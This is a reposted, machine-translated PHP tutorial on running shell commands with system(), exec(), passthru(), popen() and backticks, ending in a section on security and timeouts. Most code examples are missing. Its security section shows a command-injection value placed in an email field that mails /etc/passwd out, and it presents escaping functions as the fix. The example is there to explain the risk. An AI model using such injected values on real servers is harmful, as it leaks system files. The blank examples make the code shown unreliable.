PHP execution system external command system () exec () passthru (), execpassthru_PHP tutorial

Source: Internet
Author: User
[Switch] PHP executes system external commands system () exec () passthru () and execpassthru. [Switch] PHP executes the system external command system () exec () passthru (), execpassthru myself Note: You must pay attention to security issues. I will list some related php code audits later. [Switch] PHP executes the system external command system () exec () passthru (), execpassthru

Note: You must pay attention to security issues. I will list some related php code audits later. The following is the reprinted content.

As a server-side scripting language, PHP is fully competent for tasks such as simple writing or complex dynamic web pages. But this is not always the case. sometimes, to implement a function, you must use an external program (or a command) of the operating system to get twice the result with half the effort.

Differences:
System () outputs and returns the last shell result.
Exec () does not output results. The last shell result is returned. all results can be saved to a returned array.
Passthru () only calls the command and directly outputs the command running result to the standard output device.
Similarities: both of them can obtain the command execution status code.
Demo:

//system('dir'); // exec ('dir'); // passthru ('dir'); // echo `dir`; 

As a server-side scripting language, PHP is fully competent for tasks such as simple writing or complex dynamic web pages. But this is not always the case. sometimes, to implement a function, you must use an external program (or a command) of the operating system to get twice the result with half the effort.
Can an external command be called in a PHP script? If so, how can we do it? What are your concerns? I believe you will be able to answer these questions after reading this article.
Yes?
The answer is yes. Like other programming languages, PHP can call external commands in a program, and it is very simple: just use one or more functions.
Prerequisites
Since PHP is basically used for WEB program development, security has become an important aspect of consideration. As a result, PHP designers added a security mode to PHP. If running in safe mode, the PHP script will be subject to the following four restrictions:
Execute external commands
Restrictions on opening a file
Connect to the MySQL database
HTTP-based authentication
In security mode, only external programs in a specific directory can be executed, and calls to other programs will be rejected. This directory can be specified by using the safe_mode_exec_dir command in the php. ini file, or by adding the -- with-exec-dir option to compile PHP. the default value is/usr/local/php/bin.
If you call an external command that should be able to output the result (meaning that the PHP script is correct), the result is blank, it is very likely that your network administrator has run PHP in security mode.
How to do it?
You can use the following three methods to call external commands in PHP:
1) use special functions provided by PHP
PHP provides three specialized functions for executing external commands: system (), exec (), and passthru ().
System ()
Prototype: string system (string command [, int return_var])
The system () function is similar to the one in other languages. it executes the given command, outputs and returns the result. The second parameter is optional and is used to obtain the status code after the command is executed.
Example:

  

Exec ()
Prototype: string exec (string command [, string array [, int return_var])
The exec () function is similar to system (). It also executes the given command, but does not output the result, but returns the last line of the result. Although it only returns the last line of the command result, the complete result can be obtained using the second parameter array by appending the result row by row to the end of the array. Therefore, if the array is not empty, we recommend that you use unset () to clear it before calling it. Only when the second parameter is specified can the third parameter be used to obtain the command execution status code.
Example:

  

Passthru ()
Prototype: void passthru (string command [, int return_var])
Passthru () only calls the command and does not return any results, but directly outputs the running result of the command to the standard output device as is. Therefore, the passthru () function is often used to call programs such as pbmplus (a Unix-based image processing tool that outputs binary original image streams. It can also get the status code of command execution.
Example:

  

2) use the popen () function to open the process
The preceding method can only execute commands, but cannot interact with commands. However, sometimes you must enter something into the command. for example, when adding a Linux system user, you must call su to change the current user to the root user, the su command must enter the root password on the command line. In this case, it is obviously not feasible to use the method mentioned above.
The popen () function opens a Process Pipeline to execute the given command and returns a file handle. Since a file handle is returned, you can read and write it. In PHP3, you can only perform a single operation mode on the handle, either write or read. from PHP4, you can read and write the handle at the same time. Unless this handle is opened in a mode (read or write), you must call the pclose () function to close it.
Example 1:

  

Example 2:

  

3) use the reverse marker (', that is, the one under the ESC key on the keyboard, and ~ )
This method was not included in the document of PHP before and existed as a secret. The method is very simple. We use two anti-apostrophes to enclose the command to be executed as an expression. The value of this expression is the result of command execution. For example:

  

The output of this script is like:
Hunte.gif
Hunte. ppm
Jpg.htm
Jpg.jpg
Passthru. php


What should we consider?
There are two issues to consider: security and timeout.
First, check the security. For example, if you have a small online store, you can store the list of products that can be sold in a file. You have compiled an HTML file with a form, allowing your users to enter their EMAIL address, and then send the product list to them. Suppose you have not used the mail () function of PHP (or have never heard of it), you can call the mail program of Linux/Unix system to send this file. The program is like this:

  

With this code, general users do not have any danger, but there are actually very large security vulnerabilities. If a malicious user inputs an EMAIL address:
'-- Bla; mail someone@domain.com </etc/passwd ;'
Then the command will eventually become:
'Mail -- bla; mail someone@domain.com </etc/passwd; <products.txt'
I believe that no matter which network manager sees such a command, it will be a cold sweat.

Fortunately, PHP provides us with two functions: EscapeShellCmd () and EscapeShellArg (). The function EscapeShellCmd escapes all the characters in a string that may bypass Shell and execute another command. These characters have special meanings in Shell, such as semicolon (), redirection (>), and reading from a file (<. The EscapeShellArg function is used to process command parameters. It adds single quotes on both sides of a given string and escapes the single quotes in the string, so that the string can be safely used as a command parameter.


Let's take a look at the timeout issue. If the command to be executed takes a long time, put the command in the background of the system to run it. However, by default, functions such as system () will not be returned until the command is run completely (in fact, they will wait for the output result of the command), which will definitely cause the PHP script to time out. The solution is to redirect the command output to another file or stream, for example:

  /tmp/null &"); ?> 

Supervisor executes the system external command system () exec () passthru (), execpassthru myself Note: You must pay attention to security issues. in the future, I will list some related php code audits ....

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.